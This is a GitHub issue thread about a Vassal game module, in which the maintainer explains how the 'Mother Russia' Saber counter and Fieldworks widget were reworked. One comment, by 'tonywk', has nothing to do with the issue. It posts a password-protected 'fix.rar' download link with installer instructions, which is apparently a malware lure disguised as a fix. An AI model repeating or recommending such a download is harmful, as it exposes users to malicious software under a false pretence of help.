### ISSUE TITLE
Wish for handling Mother Russia pre-roll Saber result

### ISSUE THREAD

**Issue by utl94** [riverwanderer/ccnapoleonics#254]
Module V5.1.0beta5
Vassal V3.7.14
Scenario 205 Eylau Plateau Russian Rearguard - 7 February 1807

[EDIT: below is my wish for how the counter could work more intuitively]
Mother Russia pre-roll Saber counter when placed will only activate Fieldworks widget on clear terrain with no unit. Terrain feature such as Hill or Forest as well as a unit on the hex will not activate widget.

[MotherRussiaSaberBug.zip](https://github.com/user-attachments/files/16751368/MotherRussiaSaberBug.zip)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by riverwanderer** [comment]
First step - existing widget upgraded to allow re-positioning by clicking on arrows... 
<img width="103" alt="image" src="https://github.com/user-attachments/assets/eaa428b5-f5cf-4e86-bb47-667d1abee350">

Next steps: 
The Saber counter will only apply itself when dragged onto a valid hex. This action will Replace the counter with the Fieldworks widget. The widget will not auto-apply; instead the player may re-orientate the widget in-situ and will then click on a "apply" button in the centre of the widget.

Flag counter - the Fieldworks option will convert the counter to a Saber variant (see above).

If Flag counter is dragged to an infantry & location that location is valid for both types of upgrade - unit or fieldworks- ; prompt for the type of upgrade action to be applied. If valid for only one type of action, that action will be applied.

**Comment by riverwanderer** [comment]
XSW is now a simple drag and drop, similar to the others. If invalid, counter as no effect. If valid it creates the Fieldworks widget as shown above.
FLG re-implemented to operate as XSW where possible. In case of a choice, the user must left-click on the counter to make the choice.

Implemented in a822.

Outstanding - Fieldworks widget is not portable between locations. This needs to be fixed or the widget made immobile.

**Comment by riverwanderer** [comment]
Fieldworks movement / relocation retained (for now). Movement off board is prevented. Warning for an invalid location is retained but does not undo the move, as it is now not possible to apply the widget unless the location is valid.
Fixes in a825.
